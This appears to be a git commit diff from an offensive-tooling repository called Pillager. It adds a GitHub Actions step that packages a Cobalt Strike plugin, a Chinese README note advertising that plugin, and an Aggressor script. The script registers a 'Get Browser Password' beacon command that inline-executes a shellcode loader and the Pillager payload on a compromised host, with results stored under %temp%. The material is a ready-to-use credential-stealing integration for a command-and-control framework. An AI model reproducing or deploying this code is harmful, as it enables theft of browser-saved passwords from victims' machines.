Compare commits

...

3 Commits

Author SHA1 Message Date
簞純 8484a1b716
Update README.md 2023-06-29 08:37:26 +08:00
qwqdanchun cf1bd2a9cd Update main.yml 2023-06-29 08:30:59 +08:00
qwqdanchun bbbd4a3a40 test 2023-06-29 08:29:55 +08:00
5 changed files with 47 additions and 0 deletions

View File

@ -81,3 +81,25 @@ jobs:
asset_path: ./Pillager.bin
asset_name: Pillager.bin
asset_content_type: application/octet-stream
- name: Install 7Zip PowerShell Module
shell: powershell
run: Install-Module 7Zip4PowerShell -Force -Verbose
- name: Copy Pillager.bin
run: copy .\Pillager.bin .\cs-plugin\module\Pillager.bin
- name: Pack Plugin Folder
shell: powershell
run: Compress-7Zip "cs-plugin" -ArchiveFileName "cs-plugin.zip" -Format Zip
- name: Upload Plugin Zip
id: upload-plugin-zip
uses: actions/upload-release-asset@v1
env:
GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }}
with:
upload_url: ${{ steps.create_release.outputs.upload_url }}
asset_path: ./cs-plugin.zip
asset_name: cs-plugin.zip
asset_content_type: application/octet-stream

View File

@ -22,3 +22,5 @@
## 编译
Release有Github Action自动编译的exe及shellcode可以直接使用
为了方便使用Release附带了cs插件版本使用Pillager命令即可执行

23
cs-plugin/browser.cna Normal file
View File

@ -0,0 +1,23 @@
beacon_command_register(
"Pillager",
"Get Browser Password",
"Usage: Pillager");
alias Pillager {
$bid = $1;
$barch = barch($bid);
$handle1 = openf(script_resource("module/scloader. $+ $barch $+ .o"));
$data1 = readb($handle1, -1);
closef($handle1);
$handle2 = openf(script_resource("module/Pillager.bin"));
$data2 = readb($handle2, -1);
closef($handle2);
$args = bof_pack($bid, "b", $data2);
beacon_inline_execute($bid, $data1, "go", $args);
btask($bid, "Results can be found at %temp%\\Pillager");
}

Binary file not shown.

Binary file not shown.